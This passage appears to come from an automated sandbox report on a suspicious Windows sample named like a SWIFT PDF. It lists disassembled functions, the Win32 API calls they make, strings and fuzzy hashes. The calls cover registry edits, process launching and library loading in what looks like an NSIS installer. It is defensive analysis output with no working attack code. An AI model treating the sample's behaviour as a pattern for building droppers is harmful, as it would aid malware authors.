                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                • MulDiv.KERNEL32(?,?,?), ref: 00402D4D
                                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                  • Part of subcall function 00403258: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403091
                                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403138
                                                                                                                                  • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403161
                                                                                                                                  • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403174
                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2082585436-0
                                                                                                                                • Opcode ID: f09a1f9abd4752cb5b2d55da90d863fde1dab2faf049735581e37d10801ea25f
                                                                                                                                • Instruction ID: f11faf613eabf70f6da5efab5544ef3b1f343b4f82166007b8c29dabf9a1b1c4
                                                                                                                                • Opcode Fuzzy Hash: f09a1f9abd4752cb5b2d55da90d863fde1dab2faf049735581e37d10801ea25f
                                                                                                                                • Instruction Fuzzy Hash: D0217C72800118BFCF116FA5CE4889E7EB9EF09324F24423AF554762E0C6795D81DB68
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: *?|<>/":
                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1941528284-0
                                                                                                                                • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                • wsprintfW.USER32 ref: 00406411
                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll
                                                                                                                                • API String ID: 2200240437-2744773210
                                                                                                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1356686001-0
                                                                                                                                • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                  • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3585118688-0
                                                                                                                                • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                                • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
